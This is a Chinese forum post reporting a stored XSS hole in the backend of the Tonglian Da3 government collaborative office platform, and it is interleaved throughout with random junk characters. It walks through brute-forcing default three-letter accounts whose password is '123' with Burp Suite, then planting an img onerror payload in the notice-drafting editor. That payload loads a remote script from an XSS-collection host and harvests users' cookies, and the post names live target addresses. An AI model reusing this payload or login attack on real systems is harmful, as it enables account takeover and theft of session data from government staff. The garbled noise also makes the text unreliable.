6 ^7 _ M3 |( \2 y$ |
1 t- C: ?2 X% L" l 同联Da3协同办公平台后台通用储存型xss漏洞
% d) _: l: q9 @* o$ k. e1 u
- ^! L* p) s! [" e8 E
8 f7 X/ T' g0 c 平台简介:$ Q3 a: b4 `1 J) V+ J% T
/ w; g3 {/ F. }6 a
3 y% J$ i1 f: c4 ]& G# x, X
L! A/ Q9 Q8 t! G7 ~" i1 x) f
8 }' b: R& e! d6 g. V" n# u
w/ @' Z* u4 }4 G8 e 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# r2 j: a& }. m7 |/ L5 e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ {9 Q9 a: u) o4 u0 B1 _: H( t) F
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
* a9 {3 ^' }# n- `
5 S5 _3 @* U6 W3 P4 h
8 b0 E( b# y7 a0 u0 i5 y' P! v
$ y5 a/ n- F" j, R! v
0 d& Z" E/ }. e$ s( }2 i
3 X) H# a- P4 f# F' }
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( C8 [* v3 p1 T* n( M( `0 T+ q) `
- a! A. S i; J
* B x# |( V d* {
! R8 F3 L( l! _# G1 Z! g1 Q
4 J ? x7 I0 A
- @2 W- \8 I" C- n http://1.1.1.1:7197/cap-aco/#(案例2-)
8 n5 N; q- X7 D" o
# w& o1 j$ e# w7 M3 |2 f9 _
N: K9 S1 h1 g/ t http://www.XXOO.com (案例1-官网网站)$ B) |$ E) o$ y" M$ V* L8 u+ e" h
. u! y$ q8 v* q6 e7 E
8 e' n- q0 n* `: E! g 漏洞详情:
+ {6 P7 i3 p' ?/ a3 z) R
* @0 e! _9 G+ C; r4 [9 S3 \ . W) K0 S" p% \6 g
案例一、
: t- p6 u5 [. Y O6 ^) l, u
+ q' c- I3 y7 q- x
6 Q- z, v3 e" S 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
! v" E- P2 ?. ~, K; Y! e
# ]% b. i* i0 Y: P" g: Y
) v% n3 ^2 G2 z& `- w$ j! u 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:' V3 U+ \5 S8 U- @9 Z2 D! @/ B" d
0 n) x( W8 r5 b0 r* s* g
" k% e- G) o8 K9 b. Z+ E
( G" { [" h( p! Z! W
: ]" u8 a- I, i; M4 {3 T8 O * {! y6 ]0 R8 X8 \2 J
4 l6 K0 E" B1 U7 A, V( F0 e, v
" Q- U- `% Q! L( S/ u' Z# Y# [
/ f5 g9 \) m5 B status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 G( Q* s. K r) c
; U) m6 X+ h. [& G+ D' w e; l; N
" O2 T4 Y5 X2 x7 r 8 i0 C! i; P8 o
! J* g- _# D' ~$ U; l& X
* d9 {* i3 c( S3 k4 c 
& r% d: v; M0 B
2 T3 R }. H9 ^$ X( x9 b" H8 ~
2 H. h" y3 B7 C% K9 K2 B1 u 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
" B' c( a0 S! J8 r
# }! g0 b# @8 }# T; b$ ]5 E( Q / |# f) U: j1 O8 f( F
$ A4 u% \4 a; g9 W
- n% d2 b) s' [: O/ N% _5 L- H
3 x! b. ?( e7 y. f% o <img src=x
$ Z8 ^- ^0 j- S5 T; f5 Donerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: : Z- b, X! c( p( X" [
" G$ f7 i5 W u& N) c
/ r) ~" X: i( v$ F0 Y3 G 
9 i7 i! N% T) ]' n% J$ \
+ y3 U+ C d8 n) T# Y8 ?
! Y" q# N: T7 L9 r5 u9 c+ W 然后发送,接收cookie如图: 1 p- u. A' D5 G
^ T6 y$ ?$ X # z8 ?4 D4 R+ X$ m0 S; q
% p' \& b+ x' {
9 j3 D; g6 t* S( a4 X! ? ! g! b2 j' \8 h$ R% O# a3 t. a
]' d" `/ u% M9 b
( C8 }' v0 v3 a f$ z7 ~; O
4 ?+ B% n8 t4 q1 U- ^$ u
4 D6 g- A! v$ F+ _; ]0 D: r2 y
/ C0 d e( B9 {3 Z
1 l; A ?- A1 ], w }+ j
: E, B$ V/ i# e1 I
* [# ]$ K! H3 C% e: w0 V0 Z
7 @3 @+ c6 z* x* V 
3 E$ i% |% _: l- f7 h9 s
5 U& V, q3 {$ w1 e
; F. K, ^, [0 P) N
: X, d$ o, }. `+ D8 w
" n9 ]% f; M" P+ F2 b- C" w8 J! }
3 v/ ]% \6 T/ |3 l/ c9 ^' Y
3 W* u B! s) \
# y: W7 N2 g c0 q/ G2 N. M- P
9 w$ \6 t0 Q* i$ x6 g _
案例2、
$ z$ u5 A9 b) [+ Q U& A
1 @' ?- W4 P9 G# o/ f
" J/ k) w& }5 L+ v+ Y: Z
前面步骤都一样,下面看效果图:
* ^5 L8 X; k3 o/ e2 F6 `/ S
. b2 u4 v7 m6 D6 E0 ~/ [3 P7 _
/ v/ z. \0 d0 @2 X
( K' y e6 i4 m, B
- A- P2 s% \6 }$ J
3 r9 X, W$ c4 C 
* l% T, \* ~& U+ g
, }- K! ?2 L% G& A G
0 j: i: X! M; S3 E7 F
: H# l$ ?! @( \4 r1 }6 h0 d; P
6 M! q% h1 n. V3 N
7 d8 \! s9 N, S2 C3 v" @2 n. H! k( s2 D 1 H+ v5 w( H- }: O( Q" _
* l" r) p7 X" {1 S" S
: q( h& f5 c/ A; ? 
+ \8 T* V0 i5 i
7 s4 c, Y% x) J# r
; }* K# Z4 _+ _& h # B/ `0 h- ^& I2 ?* `4 }& i
- _1 b$ l: `" r' j& v + q* j' ^0 R( o6 y' g D
- k& ?) H' n: M9 L& G% s
% M' l: J5 K! O( a" o, H) S
+ G- T- v3 u! |, N. e3 ]
8 h& u' ^1 V0 }1 q& p
9 Y# f, G+ {1 a* L& } u- {
6 v5 V/ n h: ]1 G( l( e 4 N; E5 g2 e: P6 q7 e3 b
" v7 M7 Z7 T { f/ K* U9 {. B6 I- l
发表于 2018-10-20 20:14:15
收藏
支持
反对